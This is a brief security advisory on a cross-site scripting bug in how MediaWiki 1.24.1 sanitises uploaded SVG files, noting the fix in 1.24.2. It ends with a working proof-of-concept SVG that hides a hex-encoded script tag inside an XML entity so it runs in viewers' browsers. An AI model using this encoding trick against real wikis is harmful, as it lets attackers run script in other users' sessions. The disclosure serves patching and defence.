SSD Advisory – Media Wiki SVG XSS

Introduction
MediaWiki is a free software open source wiki package written in PHP, originally for use on Wikipedia. It is now also used by several other projects of the non-profit Wikimedia Foundation and by many other wikis, including this website, the home of MediaWiki.
Vulnerable Version
Media Wiki version 1.24.1
Vendor Response
The vulnerability has been addressed in Media Wiki version 1.24.2.
Vulnerability Details
A vulnerability in the way Media Wiki handles SVG files allow attackers to cause it to display arbitrary javascript code to users that are presented with an embedded SVG file. The vulnerability is triggered through the use of an encoded ENTITY that doesn’t get properly filtered out for malicious content.

media wiki svg xss
Exploit

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"
[
<!ENTITY lol "lol">
<!ENTITY lol2 "&#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x45;&#x44;&#x20;&#x3D;&#x3E;&#x20;&#x27;&#x2B;&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x64;&#x6F;&#x6D;&#x61;&#x69;&#x6E;&#x29;&#x3B;&#x3C;&#x2F;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="68" height="68" viewBox="-34 -34 68 68" version="1.1">
  <circle cx="0" cy="0" r="24" fill="#c8c8c8"/>
  <text x="0" y="0" fill="black">&lol2;</text>
</svg>